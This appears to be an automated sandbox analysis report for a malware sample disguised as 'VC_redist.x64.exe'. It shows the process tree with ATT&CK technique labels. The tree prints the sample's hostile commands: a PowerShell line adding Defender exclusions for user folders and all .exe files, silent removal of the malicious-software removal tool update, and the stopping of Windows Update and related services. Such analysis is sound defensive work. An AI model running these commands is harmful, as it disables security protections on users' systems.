C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:1036
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:868
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:628
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4912
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2916
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1984
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2576
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:460
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:624
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:1916
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:4832
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:1516
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:4500
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:4432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery